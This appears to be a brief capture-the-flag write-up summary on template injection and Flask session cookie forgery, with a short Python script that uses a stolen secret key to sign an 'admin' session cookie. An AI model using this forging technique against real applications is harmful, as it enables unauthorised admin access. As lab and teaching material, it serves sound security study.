Tags: forgery cookie
Rating: 5.0
Template injection and cookie forgery
1. Steal secret key
2. Create signed cookie using the secret key
```
from flask import Flask
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)
@app.route('/')
def index():
print(session_serializer.dumps("admin"))
return "lol"
```
More details in the original writeup